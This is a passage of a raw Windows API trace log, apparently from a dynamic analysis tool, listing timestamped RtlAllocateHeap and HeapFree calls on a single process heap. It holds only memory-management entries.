RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2f32730 [0189.535] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2f45940 [0189.536] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2f58b50 [0189.536] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2f6bd60 [0189.537] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2f7ef70 [0189.537] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2f92180 [0189.538] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2fa5390 [0189.538] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2fb85a0 [0189.539] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2fcb7b0 [0189.539] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2fde9c0 [0189.743] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x58c5c0 | out: hHeap=0x560000) returned 1 [0201.450] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x597450 | out: hHeap=0x560000) returned 1 [0201.450] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5b7250 | out: hHeap=0x560000) returned 1 [0201.450] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ca460 | out: hHeap=0x560000) returned 1 [0201.450] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5dd670 | out: hHeap=0x560000) returned 1 [0201.450] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5f0880 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x603a90 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616ca0 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x629eb0 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x63d0c0 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x1e80080 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x1e93290 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x1ea64a0 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x1eb96b0 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x1ecc8c0 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x1edfad0 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x1ef2ce0 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x1f05ef0 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x1f19100 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x1f2c310 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x1f3f520 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x1f52730 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2060080 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2073290 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x20864a0 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x20996b0 | out: hHeap=0x560000) returned 1 [0201.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x20ac8c0 | out: hHeap=0x560000) returned 1 [0201.472] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x20bfad0 | out: hHeap=0x560000) returned 1 [0201.473] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x20d2ce0 | out: hHeap=0x560000) returned 1 [0201.473] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x20e5ef0 | out: hHeap=0x560000) returned 1 [0201.473] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x20f9100 | out: hHeap=0x560000) returned 1 [0201.473] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x210c310 | out: hHeap=0x560000) returned 1 [0201.473] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x211f520 | out: hHeap=0x560000) returned 1 [0201.474] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2132730 | out: hHeap=0x560000) returned 1 [0201.474] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2145940 | out: hHeap=0x560000) returned 1 [0201.474] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2158b50 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x216bd60 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x217ef70 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2192180 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x21a5390 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x21b85a0 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x21cb7b0 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x21de9c0 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x21f1bd0 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2204de0 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2217ff0 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x222b200 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x223e410 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2260080 | out: hHeap=0x560000) returned 1 [0201.824] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2273290 | out: hHeap=0x560000) returned 1 [0201.832] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x22864a0 | out: hHeap=0x560000) returned 1 [0201.832] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x22996b0 | out: hHeap=0x560000) returned 1 [0201.832] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x22ac8c0 | out: hHeap=0x560000) returned 1 [0201.832] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x22bfad0 | out: hHeap=0x560000) returned 1 [0201.832] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x22d2ce0 | out: hHeap=0x560000) returned 1 [0201.833] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x22e5ef0 | out: hHeap=0x560000) returned 1 [0201.833] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x22f9100 | out: hHeap=0x560000) returned 1 [0201.833] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x230c310 | out: hHeap=0x560000) returned 1 [0201.833] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x231f520 | out: hHeap=0x560000) returned 1 [0201.833] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2332730 | out: hHeap=0x560000) returned 1 [0201.833] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2345940 | out: hHeap=0x560000) returned 1 [0201.833] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2358b50 | out: hHeap=0x560000) returned 1 [0201.839] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x236bd60 | out: hHeap=0x560000) returned 1 [0201.840] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x237ef70 | out: hHeap=0x560000) returned 1 [0201.840] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2392180 | out: hHeap=0x560000) returned 1 [0201.840] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x23a5390 | out: hHeap=0x560000) returned 1 [0201.840] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x23b85a0 | out: hHeap=0x560000) returned 1 [0201.840] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x23cb7b0 | out: hHeap=0x560000) returned 1 [0201.840] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x23de9c0 | out: hHeap=0x560000) returned 1 [0201.840] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x23f1bd0 | out: hHeap=0x560000) returned 1 [0201.840] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2404de0 | out: hHeap=0x560000) returned 1 [0201.840] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2417ff0 | out: hHeap=0x560000) returned 1 [0201.845] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x242b200 | out: hHeap=0x560000) returned 1 [0201.847] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x243e410 | out: hHeap=0x560000) returned 1 [0201.847] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2451620 | out: hHeap=0x560000) returned 1 [0201.847] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2464830 | out: hHeap=0x560000) returned 1 [0201.851] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2477a40 | out: hHeap=0x560000) returned 1 [0201.851] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x248ac50 | out: hHeap=0x560000) returned 1 [0201.851] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x249de60 | out: hHeap=0x560000) returned 1 [0201.852] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x24b1070 | out: hHeap=0x560000) returned 1 [0201.852] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x24c4280 | out: hHeap=0x560000) returned 1 [0201.852] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x24d7490 | out: hHeap=0x560000) returned 1 [0201.852] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x24ea6a0 | out: hHeap=0x560000) returned 1 [0201.852] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x24fd8b0 | out: hHeap=0x560000) returned 1 [0201.852] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2510ac0 | out: hHeap=0x560000) returned 1 [0201.852] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2523cd0 | out: hHeap=0x560000) returned 1 [0201.852] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2536ee0 | out: hHeap=0x560000) returned 1 [0201.852] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x254a0f0 | out: hHeap=0x560000) returned 1 [0201.852] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x255d300 | out: hHeap=0x560000) returned 1 [0201.852] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2570510 | out: hHeap=0x560000) returned 1 [0201.858] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2583720 | out: hHeap=0x560000) returned 1 [0201.858] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2596930 | out: hHeap=0x560000) returned 1 [0202.141] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x25a9b40 | out: hHeap=0x560000) returned 1 [0202.141] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x25bcd50 | out: hHeap=0x560000) returned 1 [0202.141] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x25cff60 | out: hHeap=0x560000) returned 1 [0202.141] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x25e3170 | out: hHeap=0x560000) returned 1 [0202.141] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x25f6380 | out: hHeap=0x560000) returned 1 [0202.141] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2609590 | out: hHeap=0x560000) returned 1 [0202.141] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x261c7a0 | out: hHeap=0x560000) returned 1 [0202.141] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x262f9b0 | out: hHeap=0x560000) returned 1 [0202.141] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2642bc0 | out: hHeap=0x560000) returned 1 [0202.142] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2660080 | out: hHeap=0x560000) returned 1 [0202.142] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2673290 | out: hHeap=0x560000) returned 1 [0202.142] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x26864a0 | out: hHeap=0x560000) returned 1 [0202.142] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x26996b0 | out: hHeap=0x560000) returned 1 [0202.142] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x26ac8c0 | out: hHeap=0x560000) returned 1 [0202.142] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x26bfad0 | out: hHeap=0x560000) returned 1 [0202.142] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x26d2ce0 | out: hHeap=0x560000) returned 1 [0202.142] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x26e5ef0 | out: hHeap=0x560000) returned 1 [0202.142] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x26f9100 | out: hHeap=0x560000) returned 1 [0202.142] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x270c310 | out: hHeap=0x560000) returned 1 [0202.151] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x271f520 | out: hHeap=0x560000) returned 1 [0202.157] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2732730 | out: hHeap=0x560000) returned 1 [0202.157] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2745940 | out: hHeap=0x560000) returned 1 [0202.157] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2758b50 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x276bd60 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x277ef70 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2792180 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x27a5390 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x27b85a0 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x27cb7b0 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x27de9c0 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x27f1bd0 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2804de0 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2817ff0 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x282b200 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x283e410 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2851620 | out: hHeap=0x560000) returned 1 [0202.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2864830 | out: hHeap=0x560000) returned 1 [0202.171] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2877a40 | out: hHeap=0x560000) returned 1 [0202.171] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x288ac50 | out: hHeap=0x560000) returned 1 [0202.172] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x289de60 | out: hHeap=0x560000) returned 1 [0202.172] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x28b1070 | out: hHeap=0x560000) returned 1 [0202.172] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x28c4280 | out: hHeap=0x560000) returned 1 [0202.172] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x28d7490 | out: hHeap=0x560000) returned 1 [0202.172] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x28ea6a0 | out: hHeap=0x560000) returned 1 [0202.172] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x28fd8b0 | out: hHeap=0x560000) returned 1 [0202.172] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2910ac0 | out: hHeap=0x560000) returned 1 [0202.172] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2923cd0 | out: hHeap=0x560000) returned 1 [0202.172] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2936ee0 | out: hHeap=0x560000) returned 1 [0202.172] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x294a0f0 | out: hHeap=0x560000) returned 1 [0202.172] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x295d300 | out: hHeap=0x560000) returned 1 [0202.172] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2970510 | out: hHeap=0x560000) returned 1 [0202.179] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2983720 | out: hHeap=0x560000) returned 1 [0202.179] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2996930 | out: hHeap=0x560000) returned 1 [0202.179] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x29a9b40 | out: hHeap=0x560000) returned 1 [0202.179] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x29bcd50 | out: hHeap=0x560000) returned 1 [0202.450] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x29cff60 | out: hHeap=0x560000) returned 1 [0202.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x29e3170 | out: hHeap=0x560000) returned 1 [0202.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x29f6380 | out: hHeap=0x560000) returned 1 [0202.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2a09590 | out: hHeap=0x560000) returned 1 [0202.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2a1c7a0 | out: hHeap=0x560000) returned 1 [0202.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2a2f9b0 | out: hHeap=0x560000) returned 1 [0202.451] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2a42bc0 | out: hHeap=0x560000) returned 1 [0202.452] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2a55dd0 | out: hHeap=0x560000) returned 1 [0202.452] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2a68fe0 | out: hHeap=0x560000) returned 1 [0202.452] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2a7c1f0 | out: hHeap=0x560000) returned 1 [0202.457] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2a8f400 | out: hHeap=0x560000) returned 1 [0202.457] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2aa2610 | out: hHeap=0x560000) returned 1 [0202.457] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2ab5820 | out: hHeap=0x560000) returned 1 [0202.457] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2ac8a30 | out: hHeap=0x560000) returned 1 [0202.457] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2adbc40 | out: hHeap=0x560000) returned 1 [0202.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2aeee50 | out: hHeap=0x560000) returned 1 [0202.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2b02060 | out: hHeap=0x560000) returned 1 [0202.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2b15270 | out: hHeap=0x560000) returned 1 [0202.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2b28480 | out: hHeap=0x560000) returned 1 [0202.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2b3b690 | out: hHeap=0x560000) returned 1 [0202.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2b4e8a0 | out: hHeap=0x560000) returned 1 [0202.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2b61ab0 | out: hHeap=0x560000) returned 1 [0202.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2b74cc0 | out: hHeap=0x560000) returned 1 [0202.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2b87ed0 | out: hHeap=0x560000) returned 1 [0202.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2b9b0e0 | out: hHeap=0x560000) returned 1 [0202.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2bae2f0 | out: hHeap=0x560000) returned 1 [0202.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2bc1500 | out: hHeap=0x560000) returned 1 [0202.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2bd4710 | out: hHeap=0x560000) returned 1 [0202.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2be7920 | out: hHeap=0x560000) returned 1 [0202.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2bfab30 | out: hHeap=0x560000) returned 1 [0202.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2c0dd40 | out: hHeap=0x560000) returned 1 [0202.471] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2c20f50 | out: hHeap=0x560000) returned 1 [0202.471] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2c34160 | out: hHeap=0x560000) returned 1 [0202.471] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2c47370 | out: hHeap=0x560000) returned 1 [0202.471] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2c5a580 | out: hHeap=0x560000) returned 1 [0202.471] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2c6d790 | out: hHeap=0x560000) returned 1 [0202.471] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2c809a0 | out: hHeap=0x560000) returned 1 [0202.471] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2c93bb0 | out: hHeap=0x560000) returned 1 [0202.478] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2ca6dc0 | out: hHeap=0x560000) returned 1 [0202.478] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2cb9fd0 | out: hHeap=0x560000) returned 1 [0202.478] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2ccd1e0 | out: hHeap=0x560000) returned 1 [0202.478] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2ce03f0 | out: hHeap=0x560000) returned 1 [0202.478] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2cf3600 | out: hHeap=0x560000) returned 1 [0202.478] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2d06810 | out: hHeap=0x560000) returned 1 [0202.481] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2d19a20 | out: hHeap=0x560000) returned 1 [0202.482] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2d2cc30 | out: hHeap=0x560000) returned 1 [0202.482] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2d3fe40 | out: hHeap=0x560000) returned 1 [0202.482] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2d53050 | out: hHeap=0x560000) returned 1 [0202.482] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2d66260 | out: hHeap=0x560000) returned 1 [0202.482] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2d79470 | out: hHeap=0x560000) returned 1 [0202.482] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2d8c680 | out: hHeap=0x560000) returned 1 [0202.483] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2d9f890 | out: hHeap=0x560000) returned 1 [0202.765] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2db2aa0 | out: hHeap=0x560000) returned 1 [0202.765] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2dc5cb0 | out: hHeap=0x560000) returned 1 [0202.765] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2dd8ec0 | out: hHeap=0x560000) returned 1 [0202.766] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2dec0d0 | out: hHeap=0x560000) returned 1 [0202.766] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2dff2e0 | out: hHeap=0x560000) returned 1 [0202.768] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2e124f0 | out: hHeap=0x560000) returned 1 [0202.769] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2e25700 | out: hHeap=0x560000) returned 1 [0202.769] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2e38910 | out: hHeap=0x560000) returned 1 [0202.770] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2e60080 | out: hHeap=0x560000) returned 1 [0202.770] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2e73290 | out: hHeap=0x560000) returned 1 [0202.770] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2e864a0 | out: hHeap=0x560000) returned 1 [0202.770] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2e996b0 | out: hHeap=0x560000) returned 1 [0202.770] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2eac8c0 | out: hHeap=0x560000) returned 1 [0202.770] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2ebfad0 | out: hHeap=0x560000) returned 1 [0202.770] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2ed2ce0 | out: hHeap=0x560000) returned 1 [0202.770] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2ee5ef0 | out: hHeap=0x560000) returned 1 [0202.770] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2ef9100 | out: hHeap=0x560000) returned 1 [0202.777] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2f0c310 | out: hHeap=0x560000) returned 1 [0202.779] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2f1f520 | out: hHeap=0x560000) returned 1 [0202.779] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2f32730 | out: hHeap=0x560000) returned 1 [0202.779] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2f45940 | out: hHeap=0x560000) returned 1 [0202.779] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2f58b50 | out: hHeap=0x560000) returned 1 [0202.785] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2f6bd60 | out: hHeap=0x560000) returned 1 [0202.785] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2f7ef70 | out: hHeap=0x560000) returned 1 [0202.785] HeapFree (in: hHeap=0x560000, 